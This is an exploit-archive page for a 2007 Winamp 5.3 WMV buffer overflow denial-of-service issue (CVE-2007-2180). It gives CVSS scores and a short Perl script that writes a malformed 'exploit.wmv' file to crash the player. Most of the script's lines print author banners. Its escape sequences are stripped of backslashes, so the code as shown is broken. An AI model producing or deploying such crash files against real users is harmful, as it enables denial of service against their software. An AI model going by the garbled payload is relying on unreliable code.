Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)

2007.04.26

Credit: UniquE

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2007-2180

CWE: CWE-Other

CVSS Base Score: 7.1/10

Impact Subscore: 6.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Complete

#!/usr/bin/perl

# Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)

# Type :

# Buffer Overflow - DOS

# Release Date :

# {2007-04-16}

# Product / Vendor :

# Winamp Media Player

# http://www.winamp.com/

# Exploit :

#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################

{

print "n-----------------------------------n";

print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)n";

print "-----------------------------------n";

print "nUniquE-Key{UniquE-Cracker}n";

print "UniquE[at]UniquE-Key.ORGn";

print "http://UniquE-Key.ORGn";

print "n-----------------------------------n";

print "nExploit Completed!n";

print "n-----------------------------------n";

}

open(wmv, ">./exploit.wmv");

print wmv "x00x00x00x06x00x00x00x00x00x00".

print wmv "x4Dx54x68x64";

close(wmv);

# Tested :

# --- WINAMP 5.3 Version ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.